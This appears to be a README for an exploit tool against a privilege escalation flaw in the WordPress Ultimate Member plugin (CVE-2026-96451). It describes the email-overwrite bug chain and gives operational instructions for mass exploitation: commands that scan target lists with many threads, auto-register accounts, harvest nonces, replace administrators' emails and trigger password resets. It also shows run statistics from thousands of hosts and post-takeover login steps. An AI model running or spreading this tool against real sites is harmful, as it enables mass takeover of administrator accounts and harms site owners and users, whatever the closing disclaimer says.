
WordPress Ultimate Member plugin <= 2.13.1 - Privilege Escalation vulnerability
WordPress Ultimate Member plugin <= 2.13.1 - Privilege Escalation vulnerability
Ultimate Member <= 2.13.1 — Privilege Escalation / Account Takeover
📌 Official record: CVE-2026-96451
From CVE.org:
Authorization Bypass Through User-Controlled Key vulnerability in Ultimate Member Ultimate Member ultimate-member allows Privilege Escalation. This issue affects Ultimate Member: from n/a through 2.13.1.
| Field | Value |
|---|---|
| 🆔 CVE | CVE-2026-96451 |
| 🏷️ CWE | CWE-639 — Authorization Bypass Through User-Controlled Key |
| 📊 CVSS 3.1 | 8.8 HIGH AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| 🏢 Assigner | Patchstack |
| ⚠️ Affected | Ultimate Member through 2.13.1 |
| ✅ Fixed | 2.14.0 |
A logged-in subscriber can change another user's email (usually the administrator). WordPress then accepts a password reset for that new mailbox.
um_fetch_user($user_id) and switches the global user to the ID in the URL.download_routing() returns without um_reset_user()._um_account=1, user_email=...).account_submit() reads um_user('ID') — now the victim — and writes the new email.The download nonce is wp_create_nonce($user_id . $form_id . 'um-download-nonce'). It is tied to that user ID. It cannot be invented. The script copies it from a visible /um-download/{form}/{field}/{user}/{nonce}/ link.
A custom file or image field must be shown on the profile. Built-in profile/cover photos do not produce this link.
pip install requests rich
Registration, login, nonce collection, exploit, and reset check are automatic. You do not create accounts by hand and you do not pass a subscriber password for a mass scan.
python CVE-2026-96451.py -l targets.txt -t 80 --email "[email protected]" -o um_takeover.txt
What this command does on every host:
/account//um-download/ nonce (prefers user ID 1, then any member with a file)--emailwp-login.php?action=lostpassword (WordPress does not need a nonce here)um_takeover.txt--email is the mailbox placed on the target account so you can receive the reset. The script does not open the inbox or set a new password. That last step is manual.
python CVE-2026-96451.py -u "https://example.com" --email "[email protected]"
| Flag | Purpose | Default |
|---|---|---|
-l / --list | File of targets | — |
-u / --url | One target | — |
-t / --threads | Workers | 10 |
-o / --output | Result file | um_takeover.txt |
--email | Mailbox written onto the victim | auto-generated |
--target-id | Preferred user ID | 1 |
--user / --password | Use an existing subscriber instead of registering | off |
-v / --verbose | Print every stage | off |
On a slow RDP box, 80–150 threads is enough. A list scan gives each host about 22 seconds.
[5400/11965] RST:0 CHG:0 UM:4463 REG:589 rf:3874 lf:0 na:141 nd:448 nc:0 no:937
| Code | Meaning |
|---|---|
RST / CHG | Email changed and/or reset accepted — check the inbox |
UM | Ultimate Member detected |
REG | Auto-registration created a session |
rf | No public form, CAPTCHA, approval, or email activation |
lf | Registered but login failed |
na | Account page / nonce missing |
nd | No visible download nonce (no custom file field) |
nc | Exploit sent, change not confirmed |
no | Not Ultimate Member |
REG_FAIL on many hosts is normal. The chain only continues where registration creates a session and a download link is visible.
When RST or CHG appears:
--email/wp-login.php or /wp-admin/This project is for authorized security research only — systems you own or have written permission to test.
Unauthorized access to computer systems is illegal. The author accepts no liability for misuse, damage, or any outcome of this software. You are solely responsible for how it is used and for every target you scan.
By: Nxploited ( Khaled Alenazi )